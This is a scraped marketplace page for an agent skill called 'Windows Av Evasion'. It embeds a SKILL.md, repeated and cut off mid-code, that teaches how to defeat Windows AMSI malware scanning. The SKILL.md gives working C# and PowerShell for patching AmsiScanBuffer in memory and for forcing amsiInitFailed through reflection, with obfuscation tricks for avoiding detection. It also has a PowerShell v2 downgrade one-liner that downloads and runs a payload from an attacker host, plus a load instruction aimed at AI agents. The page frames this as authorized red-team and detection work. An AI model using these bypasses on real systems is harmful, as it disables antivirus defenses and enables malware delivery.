Windows Av Evasion

Name: Windows Av Evasion
Author: yaklang

yaklang/hack-skills

Study AMSI architecture and documented bypass patterns for authorized Windows security research and defensive testing.

Overview

Windows Av Evasion is an agent skill for the Ship phase that documents AMSI bypass architecture and detailed AmsiScanBuffer patching patterns for authorized security testing.

Install

npx skills add https://github.com/yaklang/hack-skills --skill windows-av-evasion

What is this skill?

AMSI architecture diagram from script hosts through amsi.dll to AmsiScanBuffer and AV engines
Memory patching pattern targeting AmsiScanBuffer to return clean scan results (with obfuscated PowerShell examples)
Supplement module: load after main SKILL.md for PowerShell, .NET AMSI bypass, and Constrained Language Mode escape detai
Documents primary API surface: AmsiInitialize, AmsiOpenSession, AmsiScanBuffer, AmsiScanString, AmsiCloseSession
AMSI flow documents 5 core amsi.dll entry points (Initialize, OpenSession, ScanBuffer, ScanString, CloseSession)

Compatible agents: Claude Code, Cursor, Codex, any compatible agent

Adoption & trust: 1.1k installs on skills.sh; 980 GitHub stars; 0/3 security scanners passed (skills.sh audits).

What problem does it solve?

You are analyzing how AMSI inspects PowerShell and .NET in Windows but lack structured bypass patterns for authorized lab reproduction.

Who is it for?

Authorized red-teamers, security researchers, and defenders building detection rules who need AMSI-specific pattern literacy.

Skip if: Casual app developers, production feature work, or anyone without clear legal permission to test on the target environment.

When should I use this skill?

Detailed AMSI bypass code patterns, PowerShell-specific bypasses, .NET AMSI bypass, or Constrained Language Mode escape after main SKILL.md is loaded.

What do I get? / Deliverables

You understand AMSI call flow, primary patch targets, and supplement topics so defensive tests or research notes can reference consistent technique categories.

AMSI architecture reference and patch-target notes
Categorized bypass pattern outlines for research documentation

Recommended Skills

Azure Compliancemicrosoft/azure-skills

Azure Compliance is a Microsoft agent skill for solo builders and small teams who need structured security and complianc…373k installs·1.2k stars

Openclaw Secure Linux Cloudxixu-me/skills

OpenClaw Secure Linux Cloud guides a hardened VPS deployment—rootless Podman, loopback-only gateway, SSH-tunneled Contro…201k installs·61 stars

Entra Agent Idmicrosoft/azure-skills

entra-agent-id is a Microsoft-authored agent skill for provisioning and operating OAuth-capable identities tailored to A…99.1k installs·1.2k stars

Firebase Security Rules Auditorfirebase/agent-skills

Firebase Security Rules Auditor turns your agent into a senior penetration-style reviewer for Firestore rulesets. Solo b…40.3k installs·345 stars

Firestore Security Rules Auditorfirebase/agent-skills

Firestore-security-rules-auditor is a checker skill for solo builders and small teams shipping Firebase-backed apps who …20.3k installs·345 stars

Skill Vetteruseai-pro/openclaw-skills-security

Skill Vetter is a security-first OpenClaw agent skill that makes your coding agent behave like a pre-install auditor for…19.2k installs·62 stars

Journey fit

Primary fit

AV/AMSI evasion knowledge sits in security hardening and assessment work typically done before or during controlled ship and release validation. Content is AMSI-focused offensive technique reference—aligned with application security testing, not general product coding.

How it compares

Offensive technique deep-dive paired with a parent evasion SKILL.md—not a compliance checklist or dependency vulnerability scanner.

Common Questions / FAQ

Who is windows-av-evasion for?

Security practitioners with authorization to study Windows AMSI bypass methods for penetration testing, malware analysis, or blue-team detection engineering.

When should I use windows-av-evasion?

During Ship → security in controlled labs when reproducing AMSI behavior, after loading the main AV evasion SKILL.md for broader context.

Is windows-av-evasion safe to install?

Content is sensitive offensive-security material; review the Security Audits panel on this Prism page, your org policy, and never run patterns on systems you do not own or lack written permission to test.

SKILL.md

READMESKILL.md - Windows Av Evasion

# AMSI Bypass Techniques — Detailed Patterns

> **AI LOAD INSTRUCTION**: Load this for detailed AMSI bypass code patterns, PowerShell-specific bypasses, .NET AMSI bypass, and Constrained Language Mode escape. Assumes the main [SKILL.md](./SKILL.md) is already loaded for general AV/EDR evasion concepts.

---

## 1. AMSI ARCHITECTURE

```
PowerShell / .NET / VBScript / JScript
        │
        ▼
    amsi.dll (loaded in process)
        │
        ├── AmsiInitialize()    → Create AMSI context
        ├── AmsiOpenSession()   → Open scan session
        ├── AmsiScanBuffer()    → Scan content ← PRIMARY TARGET
        ├── AmsiScanString()    → Scan string
        └── AmsiCloseSession()  → Close session
        │
        ▼
    AV Engine (Windows Defender / third-party)
        │
        ▼
    AMSI_RESULT (Clean / Malware / Not Detected)
```

**Key insight**: Patching `AmsiScanBuffer` to always return "clean" bypasses all AMSI-enabled scanning.

---

## 2. MEMORY PATCHING — AmsiScanBuffer

### Concept

Overwrite the first bytes of `AmsiScanBuffer` so it returns `AMSI_RESULT_CLEAN` (0) immediately.

### PowerShell Implementation (Obfuscated)

```powershell
# Base pattern — variable names must be randomized per use
$a = [Ref].Assembly.GetTypes() | ? { $_.Name -like "*siUtils" }
$b = $a.GetFields('NonPublic,Static') | ? { $_.Name -like "*Context" }
# ... patching logic varies by implementation

# The actual patch writes bytes to AmsiScanBuffer:
# x64: mov eax, 0x80070057 (E_INVALIDARG); ret
# Bytes: B8 57 00 07 80 C3
```

### C# Implementation

```csharp
// Get amsi.dll handle and AmsiScanBuffer address
IntPtr amsiDll = LoadLibrary("amsi.dll");
IntPtr amsiScanBufferAddr = GetProcAddress(amsiDll, "AmsiScanBuffer");

// Change memory protection to writable
VirtualProtect(amsiScanBufferAddr, (UIntPtr)6, 0x40, out uint oldProtect);

// Patch: mov eax, 0x80070057; ret (returns E_INVALIDARG)
byte[] patch = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
Marshal.Copy(patch, 0, amsiScanBufferAddr, patch.Length);

// Restore protection
VirtualProtect(amsiScanBufferAddr, (UIntPtr)6, oldProtect, out _);
```

### Obfuscation Techniques for the Patch

```powershell
# Avoid string "AmsiScanBuffer" (itself flagged):

# XOR obfuscation
$xorKey = 0x42
$encBytes = [byte[]]@(0x23,0x2F,0x31,...) # XOR-encrypted function name

# Base64 split
$p1 = "Am"; $p2 = "si"; $p3 = "Sc"; $p4 = "anBuf"; $p5 = "fer"
$funcName = "$p1$p2$p3$p4$p5"

# Reverse string
$rev = "reffuBnacSimA"
$funcName = -join ($rev[-1..-($rev.Length)])
```

---

## 3. REFLECTION-BASED BYPASS

### Set amsiInitFailed

```powershell
# Force AMSI initialization failure via reflection
# The field name and class are obfuscated because they're flagged
$t = [Ref].Assembly.GetType(('System.Management.Automation.{0}' -f ('Am','siUtils' -join '')))
$f = $t.GetField(('am','siIn','itFailed' -join ''), 'NonPublic,Static')
$f.SetValue($null, $true)
# All subsequent AMSI scans skip (init "already failed")
```

### Disable AMSI via Session State

```powershell
# Remove AMSI providers from session
$utils = [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')
$field = $utils.GetField('amsiSession', 'NonPublic,Static')
$session = $field.GetValue($null)
# Nullify session → AMSI has no active session to scan with
```

---

## 4. POWERSHELL-SPECIFIC BYPASSES

### PowerShell v2 Downgrade

```cmd
# If .NET Framework 2.0/3.5 is installed, PS v2 has no AMSI
powershell -Version 2 -Command "IEX (New-Object Net.WebClient).DownloadString('http://attacker/payload.ps1')"

# Check if v2 is available
reg query "HKLM\SOFTWARE\Microsoft\NET Framework Setup\NDP\v2.0.50727"
```

### PowerShell Runspace (Bypass Script Block Logging + AMSI)

```csharp
// C# — create PowerShell runspace without AMSI
using System.Management.Automation;
using System.Management.Automation.Runspaces;

Runspace rs = RunspaceFactory.CreateRunspace();
rs.Open();
// Patch AMSI in this runspace
PowerShell ps = PowerShell.Create();
ps.Runspace = rs;
ps.AddSc

What is this skill?

AMSI architecture diagram from script hosts through amsi.dll to AmsiScanBuffer and AV engines

Memory patching pattern targeting AmsiScanBuffer to return clean scan results (with obfuscated PowerShell examples)

Supplement module: load after main SKILL.md for PowerShell, .NET AMSI bypass, and Constrained Language Mode escape detai

Documents primary API surface: AmsiInitialize, AmsiOpenSession, AmsiScanBuffer, AmsiScanString, AmsiCloseSession

AMSI flow documents 5 core amsi.dll entry points (Initialize, OpenSession, ScanBuffer, ScanString, CloseSession)

Compatible agents: Claude Code, Cursor, Codex, any compatible agent

Adoption & trust: 1.1k installs on skills.sh; 980 GitHub stars; 0/3 security scanners passed (skills.sh audits).

Journey fit

Primary fit

SKILL.md

READMESKILL.md - Windows Av Evasion

# AMSI Bypass Techniques — Detailed Patterns

> **AI LOAD INSTRUCTION**: Load this for detailed AMSI bypass code patterns, PowerShell-specific bypasses, .NET AMSI bypass, and Constrained Language Mode escape. Assumes the main [SKILL.md](./SKILL.md) is already loaded for general AV/EDR evasion concepts.

---

## 1. AMSI ARCHITECTURE

```
PowerShell / .NET / VBScript / JScript
        │
        ▼
    amsi.dll (loaded in process)
        │
        ├── AmsiInitialize()    → Create AMSI context
        ├── AmsiOpenSession()   → Open scan session
        ├── AmsiScanBuffer()    → Scan content ← PRIMARY TARGET
        ├── AmsiScanString()    → Scan string
        └── AmsiCloseSession()  → Close session
        │
        ▼
    AV Engine (Windows Defender / third-party)
        │
        ▼
    AMSI_RESULT (Clean / Malware / Not Detected)
```

**Key insight**: Patching `AmsiScanBuffer` to always return "clean" bypasses all AMSI-enabled scanning.

---

## 2. MEMORY PATCHING — AmsiScanBuffer

### Concept

Overwrite the first bytes of `AmsiScanBuffer` so it returns `AMSI_RESULT_CLEAN` (0) immediately.

### PowerShell Implementation (Obfuscated)

```powershell
# Base pattern — variable names must be randomized per use
$a = [Ref].Assembly.GetTypes() | ? { $_.Name -like "*siUtils" }
$b = $a.GetFields('NonPublic,Static') | ? { $_.Name -like "*Context" }
# ... patching logic varies by implementation

# The actual patch writes bytes to AmsiScanBuffer:
# x64: mov eax, 0x80070057 (E_INVALIDARG); ret
# Bytes: B8 57 00 07 80 C3
```

### C# Implementation

```csharp
// Get amsi.dll handle and AmsiScanBuffer address
IntPtr amsiDll = LoadLibrary("amsi.dll");
IntPtr amsiScanBufferAddr = GetProcAddress(amsiDll, "AmsiScanBuffer");

// Change memory protection to writable
VirtualProtect(amsiScanBufferAddr, (UIntPtr)6, 0x40, out uint oldProtect);

// Patch: mov eax, 0x80070057; ret (returns E_INVALIDARG)
byte[] patch = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
Marshal.Copy(patch, 0, amsiScanBufferAddr, patch.Length);

// Restore protection
VirtualProtect(amsiScanBufferAddr, (UIntPtr)6, oldProtect, out _);
```

### Obfuscation Techniques for the Patch

```powershell
# Avoid string "AmsiScanBuffer" (itself flagged):

# XOR obfuscation
$xorKey = 0x42
$encBytes = [byte[]]@(0x23,0x2F,0x31,...) # XOR-encrypted function name

# Base64 split
$p1 = "Am"; $p2 = "si"; $p3 = "Sc"; $p4 = "anBuf"; $p5 = "fer"
$funcName = "$p1$p2$p3$p4$p5"

# Reverse string
$rev = "reffuBnacSimA"
$funcName = -join ($rev[-1..-($rev.Length)])
```

---

## 3. REFLECTION-BASED BYPASS

### Set amsiInitFailed

```powershell
# Force AMSI initialization failure via reflection
# The field name and class are obfuscated because they're flagged
$t = [Ref].Assembly.GetType(('System.Management.Automation.{0}' -f ('Am','siUtils' -join '')))
$f = $t.GetField(('am','siIn','itFailed' -join ''), 'NonPublic,Static')
$f.SetValue($null, $true)
# All subsequent AMSI scans skip (init "already failed")
```

### Disable AMSI via Session State

```powershell
# Remove AMSI providers from session
$utils = [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')
$field = $utils.GetField('amsiSession', 'NonPublic,Static')
$session = $field.GetValue($null)
# Nullify session → AMSI has no active session to scan with
```

---

## 4. POWERSHELL-SPECIFIC BYPASSES

### PowerShell v2 Downgrade

```cmd
# If .NET Framework 2.0/3.5 is installed, PS v2 has no AMSI
powershell -Version 2 -Command "IEX (New-Object Net.WebClient).DownloadString('http://attacker/payload.ps1')"

# Check if v2 is available
reg query "HKLM\SOFTWARE\Microsoft\NET Framework Setup\NDP\v2.0.50727"
```

### PowerShell Runspace (Bypass Script Block Logging + AMSI)

```csharp
// C# — create PowerShell runspace without AMSI
using System.Management.Automation;
using System.Management.Automation.Runspaces;

Runspace rs = RunspaceFactory.CreateRunspace();
rs.Open();
// Patch AMSI in this runspace
PowerShell ps = PowerShell.Create();
ps.Runspace = rs;
ps.AddSc

Overview

Install

What is this skill?

What problem does it solve?

Who is it for?

When should I use this skill?

What do I get? / Deliverables

Recommended Skills

Journey fit

Who is windows-av-evasion for?

When should I use windows-av-evasion?

Is windows-av-evasion safe to install?

SKILL.md

This week for builders

Overview

Install

What is this skill?

What problem does it solve?

Who is it for?

When should I use this skill?

What do I get? / Deliverables

Recommended Skills

Journey fit

Who is windows-av-evasion for?

When should I use windows-av-evasion?

Is windows-av-evasion safe to install?

SKILL.md